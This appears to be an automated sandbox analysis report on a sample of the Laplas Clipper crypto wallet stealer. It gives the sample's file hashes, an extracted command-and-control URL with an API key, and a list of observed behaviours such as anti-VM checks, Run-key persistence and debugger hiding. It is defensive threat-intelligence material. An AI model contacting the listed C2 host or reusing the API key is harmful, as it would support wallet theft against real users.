General

  • Target

    4f7f72d5fa0dbdd886de53c3e9bc01cd76bbb94d8d3b0d1deba3eb56d84f1ea4

  • Size

    4.6MB

  • Sample

    230720-d6cxtsda8z

  • MD5

    44e4af2a42e0709726bc55c48755b6c6

  • SHA1

    f30667ab145f876ed67f3568771c9f44cbb075c8

  • SHA256

    4f7f72d5fa0dbdd886de53c3e9bc01cd76bbb94d8d3b0d1deba3eb56d84f1ea4

  • SHA512

    ce98088c7ef0c6ba4e0d0acade13eca5d7dfbfea572c805bc28b26c5cb86889b0d19fdd0e194dd80398c1a4734c201045d63b406bf102f9ff10b94bef8929844

  • SSDEEP

    98304:N5QHGBGgZ9TeexEgENstZK0ZqjFOrbKSNm0rkR2U1PZGP0AeZ3o20SlC4W6+EhAG:NO8DZ9TePgEwPZ+OHHrLU1xI0AeZ4ClR

Malware Config

Extracted

Family

laplas

C2

http://lpls.tuktuk.ug

Attributes
  • api_key

    a0f588021b58e0c7908a163f8750678efedf2a66bf739a12427b379aef47ccde

Targets

    • Target

      4f7f72d5fa0dbdd886de53c3e9bc01cd76bbb94d8d3b0d1deba3eb56d84f1ea4

    • Size

      4.6MB

    • MD5

      44e4af2a42e0709726bc55c48755b6c6

    • SHA1

      f30667ab145f876ed67f3568771c9f44cbb075c8

    • SHA256

      4f7f72d5fa0dbdd886de53c3e9bc01cd76bbb94d8d3b0d1deba3eb56d84f1ea4

    • SHA512

      ce98088c7ef0c6ba4e0d0acade13eca5d7dfbfea572c805bc28b26c5cb86889b0d19fdd0e194dd80398c1a4734c201045d63b406bf102f9ff10b94bef8929844

    • SSDEEP

      98304:N5QHGBGgZ9TeexEgENstZK0ZqjFOrbKSNm0rkR2U1PZGP0AeZ3o20SlC4W6+EhAG:NO8DZ9TePgEwPZ+OHHrLU1xI0AeZ4ClR

    • Laplas Clipper

      Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Checks whether UAC is enabled

    • Suspicious use of NtSetInformationThreadHideFromDebugger

MITRE ATT&CK Enterprise v6

Tasks